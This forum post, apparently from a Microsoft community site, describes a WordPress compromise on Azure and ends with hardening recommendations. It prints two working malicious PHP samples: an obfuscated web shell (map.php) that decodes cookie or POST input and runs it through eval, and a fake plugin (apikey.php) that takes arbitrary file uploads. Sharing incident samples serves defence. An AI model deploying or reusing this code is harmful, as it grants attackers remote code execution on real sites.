Home

Malware Wordpress on Azure

%3CLINGO-SUB%20id%3D%22lingo-sub-881653%22%20slang%3D%22en-US%22%3EMalware%20Wordpress%20on%20Azure%3C%2FLINGO-SUB%3E%3CLINGO-BODY%20id%3D%22lingo-body-881653%22%20slang%3D%22en-US%22%3E%3CP%3ERecently%20received%20a%20security%20alert%20on%20a%20wordpress%20webapp%20running%20on%20Azure%3A%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3E1.%20There%20was%20a%20non-recognized%20authentication%20as%20admin%20user%3C%2FP%3E%0A%3CP%3E2.%20The%20user%20Uploaded%20a%20.zip%20file%20to%20the%20plugins%20folder%20that%20contained%202%20files%3A%20map.php%20and%20apikey.php%3C%2FP%3E%0A%3CP%3E3.%20The%20user%20performed%20a%20%22test%22%20through%20the%20%22plugin%22%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EExample%20of%20the%20code%20map.php%3A%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CPRE%20class%3D%22lia-code-sample%20language-php%22%3E%3CCODE%3E%3CP%3E%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3ESucuri%20sent%20out%20an%20alert%20that%20the%20.zip%20file%20was%20uploaded%20to%20the%20site.%20At%20this%20point%20there%20is%20no%20easy%20way%20to%20find%20the%20affected%20files%20on%20a%20Wordpress%20installation%20even%20using%20some%20tools%20like%20the%20sucuri%20scanner%20tool%20online.%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3ERecommendations%3A%26nbsp%3B%3C%2FP%3E%0A%3CP%3E%26nbsp%3B.%20Enable%20Sucuri%20plugin%20on%20your%20WP%3C%2FP%3E%0A%3CP%3E%26nbsp%3B.%20Enable%20WAF%20v2%20on%20your%20webapp%3C%2FP%3E%0A%3CP%3E%26nbsp%3B.%20If%20possible%20isolate%20your%20resource%20using%20App%20Service%20Environment%3C%2FP%3E%0A%3CP%3E%26nbsp%3B.%20Harden%20NSG(s)%3C%2FP%3E%0A%3CP%3E%26nbsp%3B.%26nbsp%3BPerform%20a%20SSL%20Test%20on%20your%20web%20app%3C%2FP%3E%0A%3CP%3E%26nbsp%3B%3C%2FP%3E%0A%3CP%3EIf%20you%20have%20any%20other%20tip%20recommendation%20please%20share!%3C%2FP%3E%3C%2FCODE%3E%3C%2FPRE%3E%3C%2FLINGO-BODY%3E%3CLINGO-LABS%20id%3D%22lingo-labs-881653%22%20slang%3D%22en-US%22%3E%3CLINGO-LABEL%3EApp%20Services%3C%2FLINGO-LABEL%3E%3CLINGO-LABEL%3EAzure%3C%2FLINGO-LABEL%3E%3CLINGO-LABEL%3ESecurity%3C%2FLINGO-LABEL%3E%3C%2FLINGO-LABS%3E
Dave Rendón
MVP

Recently received a security alert on a wordpress webapp running on Azure: 

 

1. There was a non-recognized authentication as admin user

2. The user Uploaded a .zip file to the plugins folder that contained 2 files: map.php and apikey.php

3. The user performed a "test" through the "plugin"

 

Example of the code map.php:

 

 

<?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?><?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?><?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}}

 

  

Example of code apikey.php:

 

 

<?php
/**
 * @package api key
 */
/*
Plugin Name: api key
*/

if ("hello"==$_GET["test"])
{
 echo "testtrue";
}
if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
{
 move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]);
 echo "true";
}

 

 

Image of the "Plugin" on the wordpress site: 

wordpress-malicious-code.png

 

Sucuri sent out an alert that the .zip file was uploaded to the site. At this point there is no easy way to find the affected files on a Wordpress installation even using some tools like the sucuri scanner tool online. 

 

Recommendations: 

 . Enable Sucuri plugin on your WP

 . Enable WAF v2 on your webapp

 . If possible isolate your resource using App Service Environment

 . Harden NSG(s)

 . Perform a SSL Test on your web app

 

If you have any other tip recommendation please share!

Related Conversations
Tabs and Dark Mode
cjc2112 in Discussions on
50 Replies
Extentions Synchronization
Deleted in Discussions on
3 Replies
Stable version of Edge insider browser
HotCakeX in Discussions on
35 Replies
How to Prevent Teams from Auto-Launch
chenrylee in Microsoft Teams on
32 Replies
Security Community Webinars
Valon_Kolica in Security, Privacy & Compliance on
15 Replies
Dev channel update to 80.0.355.1 is live
josh_bodner in Discussions on
67 Replies